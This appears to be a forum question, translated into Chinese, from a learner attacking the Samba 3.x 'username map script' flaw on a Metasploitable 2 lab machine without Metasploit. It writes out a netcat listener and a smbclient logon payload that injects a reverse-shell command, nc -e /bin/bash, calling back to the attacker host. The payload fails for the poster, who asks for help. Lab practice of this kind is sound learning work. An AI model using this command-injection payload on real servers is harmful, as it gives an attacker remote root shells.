我试图在不使用 Metasploit 的情况下利用 Metasploitable 2,目的是学习。在这种情况下,我主要关注 Samba 3.x(端口 TCP 139、445)
在这个链接http://www.rwbnetsec.com/samba-3-x/ 中,在 nmap 扫描显示 TCP 端口 139 和 445 打开后,解释了两种不同的方法来利用这台机器,这些端口正在运行 Samba 版本 3.x。
第二种方法说明
此漏洞利用了 Samba 的“用户名映射脚本”功能。没有过滤用户输入,因此攻击者可以连接到 SMB 会话,并使用 shell 元字符作为用户名的输入,导致命令在远程系统上执行。这可能允许攻击者获得具有 root 访问权限的受害者机器的远程 shell。
我的问题是在使用 Metasploit 时出现的,因为它用于:
- http://www.reydes.com/d/?q=Explotar_Vulnerabilidad_username_map_script_de_Samba_con_MSF
- http://resources.infosecinstitute.com/hacking-and-gaining-access-to-linux-by-exploiting-samba-service/
我终于找到了这个视频https://www.youtube.com/watch?v=-Y8-fZAvq9c,它避免了 Metasploit,但它对我不起作用,接下来是(Kali=192.168.200.1; Metasploitable2=192.168.200.130 ):
在终端窗口 1 中,我们将 netcat 设置为监听:
网猫-nlvp 4444
在终端窗口 2 中,我们检查共享
smbclient -L //192.168.200.130
我们关注 tmp 文件夹,并连接(终端 2):
smbclient //192.168.200.130/tmp
最后,我们获得“smb:>”,其中“logon”命令用于反向连接到 Kali,如
smb:>登录“/=
nc 192.168.200.1 4444 -e /bin/bash
”
最后一点对我不起作用,出现以下错误消息“会话设置失败:NT_STATUS_NO_MEMORY”。
我很难找到解释“登录”命令的好手册。我尝试改变 netcat 的使用方式:
在第 1 点。我写
smb: \> nc -nlvp 4444 -e /bin/bash
在第 4 点。我写
smb: \> logon "/=`nc 192.168.200.1 4444 -e /bin/bash`"
结果相同。相同的消息错误。
我真的很想自己做,但做不到。如果您能帮助我,我将不胜感激。
先感谢您!!